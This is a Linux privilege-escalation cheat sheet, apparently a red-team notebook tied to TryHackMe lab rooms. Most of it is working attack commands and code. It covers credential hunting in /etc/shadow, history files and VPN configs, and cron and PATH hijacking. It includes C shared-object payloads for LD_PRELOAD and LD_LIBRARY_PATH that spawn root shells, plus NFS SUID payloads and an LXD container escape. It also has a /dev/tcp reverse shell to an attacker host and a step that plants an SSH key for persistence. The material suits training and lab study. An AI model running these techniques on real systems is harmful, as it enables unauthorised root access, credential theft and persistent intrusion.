# Linux
##
**Gathering Info**
```
whoami
id
groups
cat ~/.bash_history
```
```
uname -a
```
Check for passwords in environment variables
```
env
```
## Find files
Files owned by your user
**Victim**
```
find / -user $USER 2>/dev/null
```
Files owned by group
**Victim**
```
find / -type f -group $GROUP 2>/dev/null
```
**Find passwords**
```
cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wpconfig.php #Wordpress sites
/home/user/myvpn.ovpn #VPN. Look for auth-user-pass and find file it is pointed to.
find / -type f -name *.bak 2>/dev/null
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/null
```
**Victim**
```
cat ~/.bash_history | grep -i passw
SSH Keys
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa
```
## Weak File Permissions
### Readable /etc/shadow
[#weak-file-permissions-readable-etc-shadow](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-readable-etc-shadow "mention")
### Writable /etc/shadow
[#weak-file-permissions-writable-etc-shadow](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-writable-etc-shadow "mention")
### Writable /etc/passwd
[#weak-file-permissions-writable-etc-passwd](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#weak-file-permissions-writable-etc-passwd "mention")
## Cron Jobs
| Finding & Comments | Example |
| ------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------- |
| Have permission to overwrite the contents of the file | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| Change path to a different file since it's not using absolute path | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| | |
**Victim**
```
cat /etc/crontab
```
Possible other places crons are running
**Victim**
```
cat /etc/cron.d/*
```
### Cron Jobs - File Permissions
**Examples**
[#cron-jobs-file-permissions](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-file-permissions "mention")
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
View the contents of the system-wide crontab.
**Victim**
```
cat /etc/crontab
```
There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.
Locate the full path of the overwrite.sh file.
**Victim**
```
locate overwrite.sh
```
Note that the file is world-writable.
**Victim**
```
ls -l /usr/local/bin/overwrite.sh
```
### Cron Jobs - PATH Environment Variable
**Examples**
[#cron-jobs-path-environment-variable](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-path-environment-variable "mention")
View the contents of the system-wide crontab
**Victim**
```
cat /etc/crontab
```
Note that the PATH variable starts with /home/user which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents
#### overwrite.sh
```
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
```
Make sure that the file is executable
**Victim**
```
chmod +x /home/user/overwrite.sh
```
Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:
**Victim**
```
/tmp/rootbash -p
```
### Cron Jobs - Wildcards
**Examples**
[#cron-jobs-wildcards](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#cron-jobs-wildcards "mention")
View the contents of the other cron job script
**Victim**
```
cat /usr/local/bin/compress.sh
```
Note that the tar command is being run with a wildcard (\*) in your home directory.
## Sudo/SUID/Capabilities
Run all of these commands then check . They may give different results
Check what can be run with NOPASSWD
**Victim**
```
sudo -l
```
| Finding | Comments | Examples |
| --------------------------- | -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| yum | Privilege Escalation | [daily-bugle](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/daily-bugle "mention") |
| anansi\_util | Privilege Escalation | [brainpan-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brainpan-1 "mention") |
| vi | | [#escaping-vi-editor](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#escaping-vi-editor "mention") [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/year-of-the-rabbit#privilege-escalation "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chocolate-factory#privilege-escalation "mention") |
| BASH scripts | | [chill-hack](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chill-hack "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wekor#privilege-escalation "mention") |
| chmod | | [#privilege-escalation-option-3-chmod](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-3-chmod "mention") |
| apache2 | | [#apache2](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#apache2 "mention") |
| nmap | | [#nmap](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#nmap "mention") |
| ftp | | [#ftp](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#ftp "mention")[#privilege-escalation-option-2-ftp](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-2-ftp "mention") |
| more | | [#more](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#more "mention") |
| less | | [#less](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#less "mention")[#privlege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brooklyn-nine-nine#privlege-escalation "mention") |
| awk | | [#awk](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#awk "mention") |
| man | | [#man](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#man "mention") |
| vim | | [#vim](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#vim "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/napping#privilege-escalation "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")[#privilege-escalation-option-1-vim](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/colddbox-easy#privilege-escalation-option-1-vim "mention") |
| find | |
| Read files | [b3dr0ck](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/b3dr0ck "mention") |
| env | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/dogcat#privilege-escalation "mention") |
| pico | | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/madeyes-castle#lateral-movement "mention") |
| flask | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/haskhell#privilege-escalation "mention") |
| python3 | | [#lateral-movement-will](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/watcher#lateral-movement-will "mention")[wonderland](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland "mention")[#tcp-22-ssh](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/tokyo-ghoul#tcp-22-ssh "mention")[#tcp-7321-script](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/peak-hill#tcp-7321-script "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/battery#privilege-escalation "mention") |
| tar | | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace#lateral-movement "mention")[#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/vulnnet#privilege-escalation "mention") |
| reboot | | [#initial-access](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/looking-glass#initial-access "mention") |
| bash | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/looking-glass#privilege-escalation "mention") |
| ALL | | [#lateral-movement](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/biteme#lateral-movement "mention") |
| fail2ban | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/biteme#privilege-escalation "mention") |
| exiftool | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/cmspit#privilege-escalation "mention") |
| awk | | [linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention") |
| apache2 | | [linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention") |
| zip | | [#tcp-22-ssh-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/tomghost#tcp-22-ssh-1 "mention") |
| tee | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/inferno#privilege-escalation "mention") |
| ko file | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/athena#privilege-escalation "mention") |
### SUID / SGID Executables - Known Exploits
Find all the SUID/SGID executables.
**Victim**
```
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```
| Finding | Comments | Examples |
| ------- | ------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| exim | version 4.84-3 | [#suid-sgid-executables-known-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-known-exploits "mention") |
| base64 | Read files we shouldn't have access to read | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| find | Privilege Escalation | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/expose#privilege-escalation "mention") |
| python3 | | [#privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/annie#privilege-escalation "mention") |
### SUID / SGID Executables - Shared Object Injection
[#suid-sgid-executables-shared-object-injection](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-shared-object-injection "mention")
### SUID / SGID Executables - Environment Variables
[#suid-sgid-executables-environment-variables](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-environment-variables "mention")
### SUID / SGID Executables - Abusing Shell Features
[#suid-sgid-executables-abusing-shell-features-1](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-abusing-shell-features-1 "mention")
[#suid-sgid-executables-abusing-shell-features-2](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#suid-sgid-executables-abusing-shell-features-2 "mention")
## Sudo - Environment Variables
### LD\_LIBRARY\_PATH
**Examples**
[#sudo-environment-variables](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#sudo-environment-variables "mention")
#### preload.c - code
```
#include
#include
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
```
#### library\_path.c
```
#include
#include
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
```
Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env\_keep options):
**Victim**
```
sudo -l
```
**LD\_PRELOAD** and **LD\_LIBRARY\_PATH** are both inherited from the user's environment. LD\_PRELOAD loads a shared object before any others when a program is run. LD\_LIBRARY\_PATH provides a list of directories where shared libraries are searched for first.
Create a shared object using the code located at /home/user/tools/sudo/preload.c.
**Victim**
```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
```
**LD\_PRELOAD** and **LD\_LIBRARY\_PATH** are both inherited from the user's environment. LD\_PRELOAD loads a shared object before any others when a program is run. LD\_LIBRARY\_PATH provides a list of directories where shared libraries are searched for first.
Create a shared object using the code located at /home/user/tools/sudo/preload.c
**Victim**
```
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp
```
A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.
Run ldd against the apache2 program file to see which shared libraries are used by the program.
**Victim**
```
ldd /usr/sbin/apache2
```
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library\_path.c.
**Victim**
```
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library\_path.c.
**Victim**
sudo LD_LIBRARY_PATH=/tmp apache2
### **LD\_PRELOAD**
**Examples**
[road](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/road "mention")
If LD\_PRELOAD is set try below then running the script we can run with NOPASSWD
**Victim**
```
vi preload.c
```
**preload.c - code**
```
#include
#include
#include
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
**Victim**
```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSE
```
## **Files with SUID-bit set**
**Victim**
```
find / -perm -u=s -type f 2> /dev/null
```
| Finding | Comments | Examples |
| ----------------------------- | ------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| setcap | If setcap is set that is very interesting checkout room. Could lead to priv esc. by setting getcap on other things. | [annie](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/annie "mention") |
| Programs in strange locations | If there is a program running in a user home directory or somewhere strange, it may be worth investigating |
|
| find | Can spawn shell | [boiler-ctf](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/boiler-ctf "mention") |
| doas | Can read files or copy files | [glitch](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/glitch "mention") |
| strings | Can read files | [jack-of-all-trades](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/jack-of-all-trades "mention") |
| cputils | Can copy files | [olympus](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/olympus "mention") |
| tar | Can spawn shell | [skynet](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/skynet "mention") |
| grep | Read files | [#unit-4-suid](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-local-enumeration#unit-4-suid "mention") |
## Getcap
**Victim**
```
getcap -r / 2>/dev/null
```
| Finding | Comments | Examples |
| ------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| python | If the binary has the Linux `CAP_SETUID` capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. | [oh-my-webserver](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/oh-my-webserver "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention") |
| vim | Can spawn shell | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| perl | Can spawn shell | [wonderland](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland "mention") |
| openssl | Can spawn shell | [mindgames](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/mindgames "mention") |
| vim | | [linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention") |
| ruby | | [#initial-shell](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/empline#initial-shell "mention") |
## **Service Exploits**
| Finding | Comments | Examples |
| ------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------- |
| mysql | | [#service-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#service-exploits "mention") |
| | | |
| | | |
## PATH Variables
**Examples**
[hacker-vs.-hacker](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hacker-vs.-hacker "mention")[#exploiting-crontab](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#exploiting-crontab "mention")
Look at the paths, below is an example of a cronjob. it first looks at /home/lachlan/bin before /bin and /usr/bin. therefore we can change pkill because it doesn't use the exact path in the cronjob. This means we can put a new file called /home/lachlan/bin/pkill with whatever we want and it will run as root.
**Victim**
```
cat /etc/crontab
```
Possible other places crons are running
**Victim**
```
cat /etc/cron.d/*
```
**Victim(lachlan)**
```
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x bin/pkill
```
### **Add path**
**Example**
[#exploiting-path-variable](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/common-linux-privesc#exploiting-path-variable "mention")
If a cron job is not specfiying the full path we may be able to change it to go towards another file.
Before we change the path we can see ls goes to /bin/ls
Now after running the below command ls is now directed to our script.
**Victim**
```
export PATH=/tmp:$PATH
```
## Passwords & Keys
### History Files
**Examples**
[#passwords-and-keys-history-files](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-history-files "mention")
**Victim**
```
cat ~/.*history | less
```
### Config Files
**Examples**
[#passwords-and-keys-config-files](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-config-files "mention")
**Victim**
```
cat /home/user/myvpn.ovpn
```
### SSH Keys
### Copy keys from Victim
**Examples**
[#passwords-and-keys-ssh-keys](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#passwords-and-keys-ssh-keys "mention")
Look for hidden files & directories in the system root.
**Victim**
```
cat /home/$USER/.ssh/$KEY
```
Copy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.
**Kali**
### **Add Keys to Victim**
**Examples**
[madeyes-castle](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/madeyes-castle "mention")
**Kali**
```
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub
```
**Victim**
```
echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keys
```
**Kali**
```
ssh $USER@$VICTIM
```
## NFS
**Examples**
[#nfs](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#nfs "mention")[linux-privilege-escalation](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privilege-escalation "mention")[linux-privesc-arena](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena "mention")
### Option #1
Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
Check the NFS share configuration on the Debian VM.
**Victim**
cat /etc/exports
no\_root\_squash is present
Note that the /tmp share has root squashing disabled.
On your Kali box, switch to your root user if you are not already running as root.
**Kali**
```
sudo su
```
Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).
**Kali**
```
mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfs
```
Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash).
**Kali**
```
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
```
Still using Kali's root user, make the file executable and set the SUID permission.
**Kali**
```
chmod +xs /tmp/nfs/shell.elf
```
Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell.
**Victim**
```
/tmp/shell.elf
```
### Option #2
**Victim**
```
showmount -e $VICTIM
cat /etc/exports
```
**Kali**
```
mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c
```
**nfc.c**
```
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
```
**Kali**
```
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc
```
**Victim**
```
cd /home/ubuntu/sharedfolder
./nfc
```
## Kernel Exploits
**Examples**
[#kernel-exploits](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc#kernel-exploits "mention")
## Writable Files
**Files where group permissions equal to "writable"**
```
find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null
```
```
find / -writable 2>/dev/null
```
## **Ports**
May be able to find open ports only accessible internally.
```
ss -ltp
netstat -tuan
```
### LXD
**Examples**
[anonymous](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/anonymous "mention")[gamingserver](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gamingserver "mention")
**Resources**
**Victim**
```
id
```
**Kali**
```
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```
**Note:** The command lxd init was to resolve a storage pool area issue, it may not always be needed.
**Victim**
```
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```
## PolKit
**Examples:** [hip-flask](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hip-flask "mention")
See if it exists.
**Kali**
```
apt list --upgradeable
```
Check out this room for more details
{% embed url="" %}
##
## Monitor Processes
**Examples**
[enumeration](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/enumeration "mention")
**Victim**
```
ps axf
```
### PSPY
script that can monitor linux processes without root access
**Kali**
```
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
```
**Victim**
```
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
```
## Docker Breakout / Privilege Escalation
{% embed url="" %}
**Examples**
[container-vulnerabilities](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hydra/container-vulnerabilities "mention")
[ultratech](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/ultratech "mention")
[dogcat](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/dogcat "mention")
[the-marketplace](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace "mention")
[chill-hack](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/chill-hack "mention")
[the-docker-rodeo](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-docker-rodeo "mention")
[the-great-escape](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-great-escape "mention")
[umbrella](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/umbrella "mention")
Copy Material from here:
## **Automated Enumeration Tools**
| Name | Link | Examples |
| ----------------------------- | ----------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
| LinPeas | | [internal](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/internal "mention") |
| LinEnum | | |
| LES (Linux Exploit Suggester) | | |
| Linux Smart Enumeration | | |
| Linux Priv Checker | | |
## Room with other things to try
## Other Cheat sheets
